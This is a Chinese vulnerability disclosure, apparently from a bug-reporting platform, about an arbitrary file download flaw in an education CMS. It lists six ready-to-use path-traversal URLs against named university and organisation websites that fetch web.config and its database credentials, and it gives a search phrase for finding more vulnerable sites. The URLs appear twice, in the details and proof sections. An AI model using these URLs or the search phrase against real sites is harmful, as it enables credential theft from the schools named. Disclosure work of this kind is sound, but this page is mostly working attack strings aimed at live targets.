某教育类通用cms任意文件下载漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某教育类通用cms任意文件下载漏洞 ### 详细说明: 不知道算不算通用 可下载web.config文件,数据库信息文件泄露 http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config 百度搜索:技术支持:南京先极科技有限公司 大部分都存在该漏洞 ### 漏洞证明: 可下载web.config文件,数据库信息文件泄露 http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息